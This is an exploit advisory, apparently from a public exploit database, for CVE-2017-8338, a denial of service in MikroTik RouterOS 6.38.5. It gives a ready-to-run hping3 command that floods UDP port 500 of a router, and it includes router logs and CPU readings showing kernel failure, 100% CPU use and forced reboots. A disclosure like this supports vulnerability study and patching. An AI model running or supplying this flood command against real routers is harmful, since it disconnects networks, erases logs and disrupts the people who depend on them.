################ #Exploit Title: MikroTik UDP Flood Denial of Service | kernel failure #Reference: https://www.vulnerability-lab.com/get_content.php?id=2064 #CVE: CVE-2017-8338 #CWE: CWE-400 #Exploit Author: Hosein Askari (FarazPajohan) #Vendor HomePage: https://mikrotik.com/ #Version : V-6.38.5 #Exploit Tested on: Parrot Security OS #Date: 09-05-2017 #Category: Network Appliance #Author Mail : hosein.askari@aol.com #Description: A vulnerability in MikroTik Version 6.38.5 could allow an unauthenticated remote attacker to exhaust all available CPU via a flood of UDP packets on port 500 (used for L2TP over IPsec), preventing the affected router from accepting new connections; all devices will be disconnected from the router and all logs removed automatically. ############### Proof of Concept (PoC): The denial of service vulnerability can be exploited by remote attackers without user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. hping3 --udp -p 6000 --destport 500 --flood [router's IP] ######################### #Log: apr/27/2017 04:37:47 system,error,critical kernel failure in previous boot apr/27/2017 04:37:47 system,error,critical out of memory condition was detected apr/27/2017 04:33:36 system,error,critical router was rebooted without proper shutdown by watchdog timer ######################## #The sample of "CPU Usage" : [admin@MikroTik] > system resource monitor cpu-used: 100% cpu-used-per-cpu: 100% free-memory: 2487KiB